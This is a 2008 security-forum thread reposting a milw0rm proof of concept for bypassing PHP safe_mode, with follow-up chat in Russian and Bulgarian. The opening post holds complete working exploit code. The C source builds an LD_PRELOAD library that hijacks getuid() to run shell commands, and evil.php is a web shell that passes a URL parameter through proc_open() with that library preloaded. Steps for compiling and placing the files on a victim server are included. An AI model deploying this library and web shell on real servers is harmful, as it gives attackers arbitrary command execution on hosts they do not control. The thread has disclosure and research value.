 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
yet another way to bypass PHP safe_mode - LD_PRELOAD |
 |
 Posted: Wed Dec 10, 2008 3:38 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
http://www.milw0rm.com/exploits/7393
| Code: |
-----------------------------------------------------------------------
+ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. +
+ By Milen Rangelov <gat3way@gat3way.eu> +
-----------------------------------------------------------------------
This *should* work provided that you have met the following requirements:
1) A writable directory under documentroot to place those files (obviously)
2) You don't have proc_open in your disabled_functions list
3) You are able to compile a shared library on the same platform as the target web server.
The reason I'm publishing that is because I posted a similar bug (putenv()+mail())
which was titled as "Bogus" one by the PHP developers.
Now, this one uses quite the same concept, only different means.
How does this work?
-------------------
You will need to upload 2 files - one precompiled shared library and a php script.
Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand
You'll need to change the $path variable to match the writable directory
Here is the library code, compile with cc -o a.so -fPIC -shared a.c
a.c:
----
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen(".comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a);
rename("a.so","b.so");
system(buf);
system("mv output.txt .comm1");
rename("b.so","a.so");
free(buf);
return 0;
}
*cut*
And that is the PHP script:
evil.php:
-------------------------
<?php
$path="/var/www"; //change to your writable path
$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("file", $path."/output.txt","w"),
2 => array("file", $path."/errors.txt", "a" )
);
$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed
sleep(1);
$a=fopen($path."/.comm1","r");
echo "<pre><b>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";
?>
*cut*
Yeah, I know, it's written pretty lame, it's just a PoC.
Why does that work?
-------------------
Because the PHP devs like to trust the environment. Especially the dynamic loader variables.
In the original bug I posted into their bugtracking system, I suggested that they clean them
in mail() for example, but....yuck the bug was classified as *bogus*.
This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot
execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash
to your command string and strip "..". Yet, proc_open() enables you to provide your own
environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and
even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh.
/bin/sh loads your h4h0r library and then BOOM!
I hope you'd find that useful.
BTW....!!! Dolu naglite programisti :DDD !!!
# milw0rm.com [2008-12-09]
|
Seems to be useful  |
|
|
|
|
|
|
|
|
| Posted: Wed Dec 10, 2008 5:45 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Ну ну.Болгаръй какие вещи начели писать.Waraxe тъй ето тестил? |
|
|
|
|
|
|
|
|
| Posted: Wed Dec 10, 2008 6:17 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| pexli wrote: | | Ну ну.Болгаръй какие вещи начели писать.Waraxe тъй ето тестил? |
Nope, not yet, but it seems reasonable idea. By the way, putenv() can be restricted in safe mode:
| Code: |
Setting certain environment variables may be a potential security breach. The safe_mode_allowed_env_vars directive contains a comma-delimited list of prefixes. In Safe Mode, the user may only alter environment variables whose names begin with the prefixes supplied by this directive. By default, users will only be able to set environment variables that begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, PHP will let the user modify ANY environment variable!
The safe_mode_protected_env_vars directive contains a comma-delimited list of environment variables, that the end user won't be able to change using putenv(). These variables will be protected even if safe_mode_allowed_env_vars is set to allow to change them.
|
Anyway - this is one more piece in puzzle of privilege escalation in php/shell |
|
|
|
|
|
|
|
|
| Posted: Wed Dec 10, 2008 6:39 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| В другом треде он написал что ето работает в PHP version:5.2.6.У меня есть тут нескока серваков в сейф мод.Надо сие чудо потестить. |
|
|
|
|
| Posted: Thu Dec 11, 2008 6:16 pm |
|
|
| gat3way |
| Regular user |
 |
|
| Joined: Dec 11, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| И какво стана? |
|
|
|
|
| Posted: Thu Dec 11, 2008 7:39 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Честно казано не съм го тествал.За тва пък вземи врътни едно форумче на сайта си поне да си чешем езиците че с тия коментари там нещо ми е зорно. |
|
|
|
|
| Posted: Thu Dec 11, 2008 7:52 pm |
|
|
| gat3way |
| Regular user |
|
|
| Joined: Dec 11, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| Ще трябва да влизам в ролята на модератор, а това хич не ми е работа |
|
|
|
|
| Posted: Thu Dec 11, 2008 7:55 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Ше ти пиша ПМ да не се осираме тук че waraxe ми е дружка. |
|
|
|
|
| Posted: Sun Jan 27, 2013 5:46 pm |
|
|
| anandinvit |
| Regular user |
|
|
| Joined: Jan 26, 2013 |
| Posts: 6 |
|
|
|
|
|
|
|
| i am unable to understand the reply |
|
|
|
|
www.waraxe.us Forum Index -> Php
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 53
Members: 0
Total: 53
